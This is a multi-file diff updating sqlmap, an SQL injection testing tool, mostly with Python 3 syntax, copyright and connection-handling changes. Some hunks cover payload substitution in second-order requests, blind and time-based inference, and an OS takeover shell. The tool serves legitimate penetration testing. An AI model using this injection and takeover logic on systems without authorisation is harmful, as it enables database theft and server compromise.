||||||
if not pageLength:
|
if pageLength is None:
|
||||||
try:
|
try:
|
||||||
page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
||||||
except MemoryError:
|
except MemoryError:
|
||||||
@@ -1236,11 +1279,20 @@ class Connect(object):
|
|||||||
warnMsg = "site returned insanely large response"
|
warnMsg = "site returned insanely large response"
|
||||||
if kb.testMode:
|
if kb.testMode:
|
||||||
warnMsg += " in testing phase. This is a common "
|
warnMsg += " in testing phase. This is a common "
|
||||||
warnMsg += "behavior in custom WAF/IPS/IDS solutions"
|
warnMsg += "behavior in custom WAF/IPS solutions"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
if conf.secondOrder:
|
if conf.secondUrl:
|
||||||
page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
|
page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
|
||||||
|
elif kb.secondReq and IPS_WAF_CHECK_PAYLOAD not in urllib.unquote(value or ""):
|
||||||
|
def _(value):
|
||||||
|
if kb.customInjectionMark in (value or ""):
|
||||||
|
if payload is None:
|
||||||
|
value = value.replace(kb.customInjectionMark, "")
|
||||||
|
else:
|
||||||
|
value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), payload, value)
|
||||||
|
return value
|
||||||
|
page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
|
||||||
|
|
||||||
threadData.lastQueryDuration = calculateDeltaSeconds(start)
|
threadData.lastQueryDuration = calculateDeltaSeconds(start)
|
||||||
threadData.lastPage = page
|
threadData.lastPage = page
|
||||||
@@ -1256,12 +1308,18 @@ class Connect(object):
|
|||||||
elif noteResponseTime:
|
elif noteResponseTime:
|
||||||
kb.responseTimes.setdefault(kb.responseTimeMode, [])
|
kb.responseTimes.setdefault(kb.responseTimeMode, [])
|
||||||
kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration)
|
kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration)
|
||||||
|
if len(kb.responseTimes[kb.responseTimeMode]) > MAX_TIME_RESPONSES:
|
||||||
|
kb.responseTimes[kb.responseTimeMode] = kb.responseTimes[kb.responseTimeMode][-MAX_TIME_RESPONSES // 2:]
|
||||||
|
|
||||||
if not response and removeReflection:
|
if not response and removeReflection:
|
||||||
page = removeReflectiveValues(page, payload)
|
page = removeReflectiveValues(page, payload)
|
||||||
|
|
||||||
kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None
|
kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None
|
||||||
kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None
|
|
||||||
|
message = extractRegexResult(PERMISSION_DENIED_REGEX, page or "", re.I)
|
||||||
|
if message:
|
||||||
|
kb.permissionFlag = True
|
||||||
|
singleTimeWarnMessage("potential permission problems detected ('%s')" % message)
|
||||||
|
|
||||||
if content or response:
|
if content or response:
|
||||||
return page, headers, code
|
return page, headers, code
|
||||||
@@ -1271,5 +1329,5 @@ class Connect(object):
|
|||||||
else:
|
else:
|
||||||
return comparison(page, headers, code, getRatioValue, pageLength)
|
return comparison(page, headers, code, getRatioValue, pageLength)
|
||||||
|
|
||||||
def setHTTPHandlers(): # Cross-linked function
|
def setHTTPHandlers(): # Cross-referenced function
|
||||||
raise NotImplementedError
|
raise NotImplementedError
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,10 +1,12 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
import socket
|
import socket
|
||||||
@@ -145,13 +147,13 @@ if __name__ == "__main__":
|
|||||||
if _ is None:
|
if _ is None:
|
||||||
break
|
break
|
||||||
else:
|
else:
|
||||||
print "[i] %s" % _
|
print("[i] %s" % _)
|
||||||
|
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
|
|
||||||
except socket.error, ex:
|
except socket.error as ex:
|
||||||
if 'Permission' in str(ex):
|
if 'Permission' in str(ex):
|
||||||
print "[x] Please run with sudo/Administrator privileges"
|
print("[x] Please run with sudo/Administrator privileges")
|
||||||
else:
|
else:
|
||||||
raise
|
raise
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -12,6 +12,7 @@ import socket
|
|||||||
import urllib2
|
import urllib2
|
||||||
|
|
||||||
from lib.core.common import getSafeExString
|
from lib.core.common import getSafeExString
|
||||||
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
@@ -48,7 +49,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
|
|||||||
|
|
||||||
# Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
|
# Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
|
||||||
# https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
|
# https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
|
||||||
if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"):
|
if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and not any((conf.proxy, conf.tor)) and hasattr(ssl, "SSLContext"):
|
||||||
for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
|
for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
|
||||||
try:
|
try:
|
||||||
sock = create_sock()
|
sock = create_sock()
|
||||||
@@ -62,7 +63,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
|
|||||||
break
|
break
|
||||||
else:
|
else:
|
||||||
sock.close()
|
sock.close()
|
||||||
except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex:
|
except (ssl.SSLError, socket.error, httplib.BadStatusLine) as ex:
|
||||||
self._tunnel_host = None
|
self._tunnel_host = None
|
||||||
logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex))
|
logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex))
|
||||||
|
|
||||||
@@ -82,7 +83,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
|
|||||||
break
|
break
|
||||||
else:
|
else:
|
||||||
sock.close()
|
sock.close()
|
||||||
except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex:
|
except (ssl.SSLError, socket.error, httplib.BadStatusLine) as ex:
|
||||||
self._tunnel_host = None
|
self._tunnel_host = None
|
||||||
logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex))
|
logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex))
|
||||||
|
|
||||||
|
|||||||
@@ -1,10 +1,12 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import re
|
import re
|
||||||
import time
|
import time
|
||||||
|
|
||||||
@@ -33,6 +35,7 @@ from lib.core.data import conf
|
|||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.data import queries
|
from lib.core.data import queries
|
||||||
|
from lib.core.decorators import stackedmethod
|
||||||
from lib.core.dicts import FROM_DUMMY_TABLE
|
from lib.core.dicts import FROM_DUMMY_TABLE
|
||||||
from lib.core.enums import CHARSET_TYPE
|
from lib.core.enums import CHARSET_TYPE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
@@ -46,6 +49,7 @@ from lib.core.settings import GET_VALUE_UPPERCASE_KEYWORDS
|
|||||||
from lib.core.settings import INFERENCE_MARKER
|
from lib.core.settings import INFERENCE_MARKER
|
||||||
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
||||||
from lib.core.settings import SQL_SCALAR_REGEX
|
from lib.core.settings import SQL_SCALAR_REGEX
|
||||||
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
from lib.core.threads import getCurrentThreadData
|
from lib.core.threads import getCurrentThreadData
|
||||||
from lib.request.connect import Connect as Request
|
from lib.request.connect import Connect as Request
|
||||||
from lib.request.direct import direct
|
from lib.request.direct import direct
|
||||||
@@ -75,6 +79,9 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar
|
|||||||
|
|
||||||
value = _goDns(payload, expression)
|
value = _goDns(payload, expression)
|
||||||
|
|
||||||
|
if payload is None:
|
||||||
|
return None
|
||||||
|
|
||||||
if value is not None:
|
if value is not None:
|
||||||
return value
|
return value
|
||||||
|
|
||||||
@@ -174,10 +181,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
|
|||||||
# forge the SQL limiting the query output one entry at a time
|
# forge the SQL limiting the query output one entry at a time
|
||||||
# NOTE: we assume that only queries that get data from a table
|
# NOTE: we assume that only queries that get data from a table
|
||||||
# can return multiple entries
|
# can return multiple entries
|
||||||
if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \
|
if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
|
||||||
not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \
|
|
||||||
expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
|
|
||||||
and not re.search(SQL_SCALAR_REGEX, expression, re.I):
|
|
||||||
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression)
|
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression)
|
||||||
|
|
||||||
if limitCond:
|
if limitCond:
|
||||||
@@ -275,7 +279,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
|
|||||||
raise SqlmapDataException(errMsg)
|
raise SqlmapDataException(errMsg)
|
||||||
|
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
print
|
print()
|
||||||
warnMsg = "user aborted during dumping phase"
|
warnMsg = "user aborted during dumping phase"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
@@ -335,6 +339,7 @@ def _goUnion(expression, unpack=True, dump=False):
|
|||||||
|
|
||||||
return output
|
return output
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
|
def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
|
||||||
"""
|
"""
|
||||||
Called each time sqlmap inject a SQL query on the SQL injection
|
Called each time sqlmap inject a SQL query on the SQL injection
|
||||||
@@ -437,7 +442,8 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
|||||||
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
||||||
|
|
||||||
if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found:
|
if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found:
|
||||||
kb.responseTimeMode = re.sub(r"(?i)[^a-z]", "", re.sub(r"'[^']+'", "", re.sub(r"(?i)(\w+)\(.+\)", r"\g<1>", expression))) if re.search(r"(?i)SELECT.+FROM", expression) else None
|
match = re.search(r"\bFROM\b ([^ ]+).+ORDER BY ([^ ]+)", expression)
|
||||||
|
kb.responseTimeMode = "%s|%s" % (match.group(1), match.group(2)) if match else None
|
||||||
|
|
||||||
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME):
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME):
|
||||||
kb.technique = PAYLOAD.TECHNIQUE.TIME
|
kb.technique = PAYLOAD.TECHNIQUE.TIME
|
||||||
@@ -471,6 +477,15 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
|||||||
warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else ""
|
warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else ""
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
|
# Dirty patch (safe-encoded unicode characters)
|
||||||
|
if isinstance(value, unicode) and "\\x" in value:
|
||||||
|
try:
|
||||||
|
candidate = eval(repr(value).replace("\\\\x", "\\x").replace("u'", "'", 1)).decode(conf.encoding or UNICODE_ENCODING)
|
||||||
|
if "\\x" not in candidate:
|
||||||
|
value = candidate
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
return extractExpectedValue(value, expected)
|
return extractExpectedValue(value, expected)
|
||||||
|
|
||||||
def goStacked(expression, silent=False):
|
def goStacked(expression, silent=False):
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -9,6 +9,8 @@ import httplib
|
|||||||
import urllib2
|
import urllib2
|
||||||
|
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
|
from lib.core.common import getSafeExString
|
||||||
|
from lib.core.exception import SqlmapConnectionException
|
||||||
|
|
||||||
class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
|
class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
|
||||||
def __init__(self, auth_file):
|
def __init__(self, auth_file):
|
||||||
@@ -19,5 +21,10 @@ class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
|
|||||||
return self.do_open(self.getConnection, req)
|
return self.do_open(self.getConnection, req)
|
||||||
|
|
||||||
def getConnection(self, host, timeout=None):
|
def getConnection(self, host, timeout=None):
|
||||||
# Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
|
try:
|
||||||
return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)
|
# Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
|
||||||
|
return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)
|
||||||
|
except IOError as ex:
|
||||||
|
errMsg = "error occurred while using key "
|
||||||
|
errMsg += "file '%s' ('%s')" % (self.auth_file, getSafeExString(ex))
|
||||||
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -32,7 +32,7 @@ class HTTPRangeHandler(urllib2.BaseHandler):
|
|||||||
urllib2.install_opener(opener)
|
urllib2.install_opener(opener)
|
||||||
|
|
||||||
# create Request and set Range header
|
# create Request and set Range header
|
||||||
req = urllib2.Request('http://www.python.org/')
|
req = urllib2.Request('https://www.python.org/')
|
||||||
req.header['Range'] = 'bytes=30-50'
|
req.header['Range'] = 'bytes=30-50'
|
||||||
f = urllib2.urlopen(req)
|
f = urllib2.urlopen(req)
|
||||||
"""
|
"""
|
||||||
|
|||||||
@@ -1,11 +1,10 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import re
|
|
||||||
import time
|
import time
|
||||||
import types
|
import types
|
||||||
import urllib2
|
import urllib2
|
||||||
@@ -17,6 +16,7 @@ from lib.core.data import conf
|
|||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.common import getHostHeader
|
from lib.core.common import getHostHeader
|
||||||
|
from lib.core.common import getSafeExString
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
from lib.core.common import logHTTPTraffic
|
from lib.core.common import logHTTPTraffic
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
@@ -76,9 +76,9 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
|||||||
|
|
||||||
try:
|
try:
|
||||||
content = fp.read(MAX_CONNECTION_TOTAL_SIZE)
|
content = fp.read(MAX_CONNECTION_TOTAL_SIZE)
|
||||||
except Exception, msg:
|
except Exception as ex:
|
||||||
dbgMsg = "there was a problem while retrieving "
|
dbgMsg = "there was a problem while retrieving "
|
||||||
dbgMsg += "redirect response content (%s)" % msg
|
dbgMsg += "redirect response content ('%s')" % getSafeExString(ex)
|
||||||
logger.debug(dbgMsg)
|
logger.debug(dbgMsg)
|
||||||
finally:
|
finally:
|
||||||
if content:
|
if content:
|
||||||
@@ -124,16 +124,25 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
|||||||
|
|
||||||
req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl)
|
req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl)
|
||||||
if headers and HTTP_HEADER.SET_COOKIE in headers:
|
if headers and HTTP_HEADER.SET_COOKIE in headers:
|
||||||
|
cookies = dict()
|
||||||
delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER
|
delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER
|
||||||
_ = headers[HTTP_HEADER.SET_COOKIE].split(delimiter)[0]
|
last = None
|
||||||
if HTTP_HEADER.COOKIE not in req.headers:
|
|
||||||
req.headers[HTTP_HEADER.COOKIE] = _
|
for part in req.headers.get(HTTP_HEADER.COOKIE, "").split(delimiter) + headers.getheaders(HTTP_HEADER.SET_COOKIE):
|
||||||
else:
|
if '=' in part:
|
||||||
req.headers[HTTP_HEADER.COOKIE] = re.sub(r"%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" % (re.escape(_.split('=')[0]), delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter))
|
part = part.strip()
|
||||||
|
key, value = part.split('=', 1)
|
||||||
|
cookies[key] = value
|
||||||
|
last = key
|
||||||
|
elif last:
|
||||||
|
cookies[last] += "%s%s" % (delimiter, part)
|
||||||
|
|
||||||
|
req.headers[HTTP_HEADER.COOKIE] = delimiter.join("%s=%s" % (key, cookies[key]) for key in cookies)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
|
result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
|
||||||
except urllib2.HTTPError, e:
|
except urllib2.HTTPError as ex:
|
||||||
result = e
|
result = ex
|
||||||
|
|
||||||
# Dirty hack for http://bugs.python.org/issue15701
|
# Dirty hack for http://bugs.python.org/issue15701
|
||||||
try:
|
try:
|
||||||
@@ -145,7 +154,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
|||||||
|
|
||||||
if not hasattr(result, "read"):
|
if not hasattr(result, "read"):
|
||||||
def _(self, length=None):
|
def _(self, length=None):
|
||||||
return e.msg
|
return ex.msg
|
||||||
result.read = types.MethodType(_, result)
|
result.read = types.MethodType(_, result)
|
||||||
|
|
||||||
if not getattr(result, "url", None):
|
if not getattr(result, "url", None):
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -19,4 +19,3 @@ def getPageTemplate(payload, place):
|
|||||||
retVal = kb.pageTemplates[(payload, place)]
|
retVal = kb.pageTemplates[(payload, place)]
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,10 +1,12 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
from extra.safe2bin.safe2bin import safechardecode
|
from extra.safe2bin.safe2bin import safechardecode
|
||||||
@@ -27,7 +29,6 @@ from lib.takeover.udf import UDF
|
|||||||
from lib.takeover.web import Web
|
from lib.takeover.web import Web
|
||||||
from lib.takeover.xp_cmdshell import XP_cmdshell
|
from lib.takeover.xp_cmdshell import XP_cmdshell
|
||||||
|
|
||||||
|
|
||||||
class Abstraction(Web, UDF, XP_cmdshell):
|
class Abstraction(Web, UDF, XP_cmdshell):
|
||||||
"""
|
"""
|
||||||
This class defines an abstraction layer for OS takeover functionalities
|
This class defines an abstraction layer for OS takeover functionalities
|
||||||
@@ -130,11 +131,11 @@ class Abstraction(Web, UDF, XP_cmdshell):
|
|||||||
command = raw_input("os-shell> ")
|
command = raw_input("os-shell> ")
|
||||||
command = getUnicode(command, encoding=sys.stdin.encoding)
|
command = getUnicode(command, encoding=sys.stdin.encoding)
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
print
|
print()
|
||||||
errMsg = "user aborted"
|
errMsg = "user aborted"
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
except EOFError:
|
except EOFError:
|
||||||
print
|
print()
|
||||||
errMsg = "exit"
|
errMsg = "exit"
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
break
|
break
|
||||||
@@ -172,9 +173,9 @@ class Abstraction(Web, UDF, XP_cmdshell):
|
|||||||
inject.goStacked(expression)
|
inject.goStacked(expression)
|
||||||
|
|
||||||
# TODO: add support for PostgreSQL
|
# TODO: add support for PostgreSQL
|
||||||
#elif Backend.isDbms(DBMS.PGSQL):
|
# elif Backend.isDbms(DBMS.PGSQL):
|
||||||
# expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1")
|
# expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1")
|
||||||
# inject.goStacked(expression)
|
# inject.goStacked(expression)
|
||||||
|
|
||||||
def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False):
|
def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False):
|
||||||
self._initRunAs()
|
self._initRunAs()
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,10 +1,12 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
import select
|
import select
|
||||||
@@ -20,7 +22,6 @@ from lib.core.common import dataToStdout
|
|||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import getLocalIP
|
from lib.core.common import getLocalIP
|
||||||
from lib.core.common import getRemoteIP
|
from lib.core.common import getRemoteIP
|
||||||
from lib.core.common import getUnicode
|
|
||||||
from lib.core.common import normalizePath
|
from lib.core.common import normalizePath
|
||||||
from lib.core.common import ntToPosixSlashes
|
from lib.core.common import ntToPosixSlashes
|
||||||
from lib.core.common import pollProcess
|
from lib.core.common import pollProcess
|
||||||
@@ -39,7 +40,6 @@ from lib.core.exception import SqlmapGenericException
|
|||||||
from lib.core.settings import IS_WIN
|
from lib.core.settings import IS_WIN
|
||||||
from lib.core.settings import METASPLOIT_SESSION_TIMEOUT
|
from lib.core.settings import METASPLOIT_SESSION_TIMEOUT
|
||||||
from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER
|
from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
|
||||||
